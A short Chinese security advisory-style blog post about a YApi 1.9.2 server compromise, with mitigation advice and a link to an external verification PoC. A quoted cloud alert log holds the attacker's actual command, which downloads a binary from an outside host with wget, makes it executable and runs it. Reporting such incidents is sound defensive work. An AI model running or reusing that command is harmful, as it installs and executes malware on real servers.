Yapi有安全漏洞,服务器被入侵了,附POC
最近看到有人的YAPI接口管理平台服务器被黑了。发现这个漏洞好像部分还存在,漏洞利用前提还是在注册用户的前提下。所以应急方式也是先关闭注册功能,排查已经注册的用户。看看有没有恶意用户。
版本号
版本: 1.9.2
什么问题
服务器被入侵了, 阿里云报的:
-[25877] PM2 v4.4.0: God Daemon (/root/.pm2)
-[26378] node server/app.js
-[31498] /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
-[25877] PM2 v4.4.0: God Daemon (/root/.pm2)
-[26378] node server/app.js
-[25877] PM2 v4.4.0: God Daemon (/root/.pm2)
-[26378] node server/app.js
-[31498] /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
-[31502] ./20000
-[31503] ./20000
该告警由如下引擎检测发现:
文件路径: /usr/bin/ps
恶意文件md5: c303c2fff08565b7977afccb762e2072
扫描来源方式: 进程启动扫描
进程id: 31969
进程命令行: ps aux如何复现此问题
~
什么浏览器
~
什么系统(Linux, Windows, macOS)
Centos
截图来自: https://github.com/YMFE/yapi/issues/2229
验证漏洞
开源验证的POC,用的pocsuite3框架,方便批量验证。及时验证资产。减少风险暴露。
POC地址:
https://github.com/awake1t/SomePocsuitePoc/blob/main/yapi-1.9.2-poc.py
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-07-05,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录